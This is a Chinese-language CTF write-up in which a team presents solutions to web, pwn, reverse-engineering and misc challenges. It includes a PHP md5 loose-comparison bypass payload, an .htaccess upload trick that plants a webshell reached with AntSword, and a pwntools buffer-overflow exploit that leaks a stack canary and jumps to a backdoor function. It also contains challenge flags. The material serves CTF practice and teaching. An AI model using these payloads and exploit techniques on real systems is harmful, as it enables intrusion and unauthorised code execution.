此次比赛偏中等难度,高级中学十三年团队共解出6题,不过还是乱杀

86f8b54ab3604249a9f594858f0d7796.png

Web

1. ezbyp@ss

<?php

highlight_file(__FILE__);

$status1=false;

$status2=false;

if(isset($_POST[‘a’])&&isset($_POST[‘b’])){

$a=$_POST[‘a’];

$b=$_POST[‘b’];

if ((md5($a)==md5($b))&&!($a===$b)){

$status1=true;

}

}

if (isset($_POST[‘password’])){

if ((($_POST[‘password’])>9999999)&&((strlen($_POST[‘password’]))<8))

{

$status2=true;

} else{

die(“please input a legal parameter”);

}

}

if ($status1&&$status2){

echo base64_encode(file_get_contents(‘flag.php’));

}

打开容器以后看到a和b是进行md5碰撞

还要使得a≠b构造a和b    a=QNKCDZO&b=240610708

if (isset($_POST[‘password’])){
if ((($_POST[‘password’])>9999999)&&((strlen($_POST[‘password’]))<8))
{
$status2=true;

看到这里发现password即要大于99999999内容长度又要小于8

构造出password是password=1e7%00*-*

最终payload是a=QNKCDZO&b=240610708&password=1e7%00*-*

使用post请求得到一串base64加密的

29d8f08d30844ad8b59601772e6e9218.png

使用base64解码即可得到flag

95efc7ed7128432eab0e281573fc27e9.png

Flag: flag{31ad7be2-3b18-414f-be8e-6dea3f8c664b}

2.Ezupload

根据题目给的hint3 .htaccess解析绕过

所以先将.htaccess写出来

018a574be8d34d438940da3d313776b1.png

先将.htaccess上传

上传成功后我们打开F12

294e111a907548979028e12fefd4ba76.png

可以看到上传的路径

接下来上传.htaccess写的shell1.jpg

5187d6502a83483292ce971d1d742c63.png

上传成功

现在使用蚁剑连接

69a6a2152fe046d7ba2f8c68143d6339.png

连接后在html目录下看到flag.php文件打开就得到flag

Flag: flag{upl0ad_in_my_ctf_challenge}

PWN

  1. Overflow

使用checksec查看发现没有PIE保护

ffa7908e4a5143b6b1acf03552967942.jpeg

使用ida进行分析

d0a5a1c76c1f4f3f93a5461266cb656f.png

看到第12行get函数存在溢出前面输入到but中然后put出来

fd2b09bc5bf84637b85998150281eb04.png

发现还有一个后门函数

构造出exp

  1. from pwn import *
  2. def printMsg(key,value):
  3.     print(“\033[1:35m{}==>{}\033[0m”.format((key),value))
  4. sys= 0x04012BA
  5. context.log_level=’debug’
  6. sh=remote(‘team.ctf.sierting.com’,10051)
  7. sh.send(‘a’*0x49)
  8. sh.recvline()
  9. sh.recv(0x48)
  10. canary=u64(sh.recv(8)) – 0x61
  11. printMsg(‘canary’,hex(canary))
  12. sh.sendline(b’a’ * 0x28 + p64(canary) +p64(0) +p64(sys))
  13. sh.interactive()

c5229787c48e4801a4c47c063869be9e.png

运行后输入cat /flag

即可得到flag

Flag:flag{canary-protect-JKjnkBJHm-jBJBIUbjib}

Reverse

  1. flowers pro max

下载附件打开

85f2fa17cf484abd8811987ef4e34281.png

随便输入以后出现这个点确定以后发现输出了

将那串md5解(4efe4660597da0c41aac0a9870202f19)’

解密后得到Ture

ec75b98bb80d45aabf9b9e761a963fb8.png

使用die打开然后查找字符串

921d4bbbbcff4cbabe5a10de8e352087.png

找到有一串md5加密后的解密发现是True

(f827cf462f62848df37c5e1e94a4da74)

将True输入进附件给的软件里面

8a9e4f98c2004cc3803f86a883b03c3b.png

发现输出了一个Your Win!!

7999ec70d7334423bf43ec2fb54365a9.png

在刚刚查找字符串是看到这个就打开C盘发现生成了

data_flowers.txt

打开发现文本框的东西这个文件里面也有

834ebd3124b84056b8de6b0be30fc08a.png

打开发现这个字符串包裹上提交

Flag:flag{BBA1JHB58DG}

Misc部分

混乱的base

cae1e5a5bc6543389ab69a9099a2f643.png

根据提示发现是爆破base64大小写,脚本如下


import base64
text = ‘ZMXHZ3TCDXI1DF9ZMF9LEN0=’
def all_possible(text):
res=[“”]
for i in text:
if not i.isalpha():
for j in range(len(res)):
res[j] += i
else:
for k in range(len(res)):
tmp = res[k]
res[k] += i.lower()
res.append(tmp + i.upper())
return res
def baopo():
k = all_possible(text)
res = []
for i in k:
try:
f = base64.b64decode(i + ”).decode(“utf-8”)
if(f.isprintable()):
res.append(f)
except:
pass
for i in res:
print(i)
print(“[*]一共解出{0}个”.format(len(res)))
baopo()

af3ccad70c6d4375b93988cf927cc3ae.png

运行结果如下

flag{\ur5t_s0_ez}

flGg{\ur5t_s0_ez}

flag{Bur5t_s0_ez}

flGg{Bur5t_s0_ez}

flag{\ur5t_Y0_ez}

flGg{\ur5t_Y0_ez}

flag{Bur5t_Y0_ez}

flGg{Bur5t_Y0_ez}

flag{\ur5t_s0_Kz}

flGg{\ur5t_s0_Kz}

flag{Bur5t_s0_Kz}

flGg{Bur5t_s0_Kz}

flag{\ur5t_Y0_Kz}

flGg{\ur5t_Y0_Kz}

flag{Bur5t_Y0_Kz}

flGg{Bur5t_Y0_Kz}

一共解出16个,发现flag{Bur5t_Y0_ez}符合flag的标准,上交,显示正确